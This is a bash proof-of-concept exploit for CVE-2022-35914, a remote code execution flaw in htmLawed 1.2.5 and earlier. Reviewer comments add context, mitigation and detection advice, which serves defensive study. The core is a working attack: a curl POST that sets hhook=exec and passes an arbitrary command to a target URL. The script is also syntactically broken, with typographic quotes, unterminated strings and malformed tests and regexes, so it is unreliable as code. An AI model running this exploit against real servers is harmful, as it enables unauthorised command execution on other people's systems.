#!/bin/bash
# Exploit Title: htmlLawed <= 1.2.5 - Remote Code Execution
# Date: 2024-05-02
# Exploit Author: Miguel Redondo (aka d4t4s3c)
# Vendor Homepage: https://www.bioinformatics.org/phplabware/internal_utilities/htmLawed
# Software Link: https://github.com/kesar/HTMLawed
# Version: <= 1.2.5
# Tested on: Linux
# Category: Web Application
# CVE: CVE-2022-35914
# Review context (defensive reading of this proof-of-concept):
#   - Purpose: sends a single HTTP POST to a caller-supplied URL (-u) carrying a
#     caller-supplied command string (-c), then prints a filtered part of the
#     response. The header attributes this to CVE-2022-35914 (htmLawed <= 1.2.5).
#   - The listing as captured is not syntactically valid bash (typographic
#     quotes, unterminated strings); it is kept exactly as published.
#   - Mitigation: upgrade htmLawed past the affected range named in the header
#     and make sure demo/test scripts shipped with third-party libraries are not
#     reachable from the web root.
# Option parsing: -u sets url, -c sets cmd. parameter_counter is incremented
# for each option but is never read anywhere in this listing.
while getopts ":u:c:" arg; do
case ${arg} in
u) url=${OPTARG}; let parameter_counter+=1 ;;
c) cmd=${OPTARG}; let parameter_counter+=1 ;;
esac
done
# Intended guard: print the banner and usage text and exit 1 when either the
# URL or the command is missing; otherwise fall through to the request below.
if ( -z "${url}" ) || ( -z "${cmd}" ); then
echo -e "\n
htmlLawed <= 1.2.5 - Remote Code Execution"
echo -e "\n(-) Usage: CVE-2022-35914.sh -u
exit 1
else
echo -e “\nhtmlLawed <= 1.2.5 - Remote Code Execution"
echo -e "\n(+) Executing Command: ${cmd}\n"
# The request: a POST whose form body carries sid=foo, hhook=exec and
# text=<cmd>, sent with a matching cookie sid=foo. The response is piped
# through egrep and sed before being printed.
# NOTE(review): hhook presumably names the server-side function applied to the
# text field - confirm against the vendor advisory.
# Detection: in web server, proxy or WAF logs, a POST body containing an hhook
# field set to a command-execution function name, together with the same sid
# value in both the body and the Cookie header, matches this request shape.
# Body logging or a WAF rule on the hhook field is needed, since access logs
# alone usually do not record POST bodies.
cmd_output=$(curl -s -d "sid=foo&hhook=exec&text=${cmd}" -b "sid=foo" ${url} | egrep '\ \((0-9)+\) =\>' | sed -E 's/\ \((0-9)+\) =\> (.*)
/\1/’)
echo -e “${cmd_output}\n”
exit 0
fi